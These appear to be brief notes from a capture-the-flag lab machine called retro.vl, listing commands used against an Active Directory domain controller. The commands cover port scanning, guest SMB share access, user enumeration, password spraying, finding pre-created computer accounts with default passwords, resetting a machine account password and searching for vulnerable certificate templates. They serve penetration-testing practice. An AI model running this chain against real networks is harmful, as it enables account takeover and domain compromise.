10.10.122.154
rustscan -a ips.txt --ulimit 5000 -- -Pn -sC -sV -oA retro
Open 10.10.122.154:53
Open 10.10.122.154:88
Open 10.10.122.154:135
Open 10.10.122.154:139
Open 10.10.122.154:389
Open 10.10.122.154:445
Open 10.10.122.154:593
Open 10.10.122.154:636
Open 10.10.122.154:3389
Open 10.10.122.154:464
Open 10.10.122.154:9389
commonName=DC.retro.vl
commonName=retro-DC-CA/domainComponent=retro
cme smb ips.txt -u 'a' -p ''
smbclient.py 'guest:@10.10.122.154'
use Trainees
mget *
exit
lookupsid.py guest@10.10.122.154
cme smb ips.txt -u users.txt -p users.txt --no-bruteforce
cme ldap ips.txt -u 'trainee' -p 'trainee' -M adcs
certipy find -vulnerable -username 'trainee' -p 'trainee' -dc-ip 10.10.122.154
smbclient.py 'trainee:trainee@10.10.122.154'
Finding precreated computer accounts
pre2k auth -u trainee -p trainee -dc-ip 10.10.122.154 -d retro.vl
cme smb ips.txt -u 'Banking' -p '/usr/share/wordlists/seclists/Passwords/Common-Credentials/common-passwords-win.txt'
OLD Machine Account
pre2k auth -u trainee -p trainee -dc-ip 10.10.122.154 -d retro.vl
kpasswd banking$
banking
certipy find -vulnerable -u 'trainee'@retro.vl -p trainee -dc-ip 10.10.82.138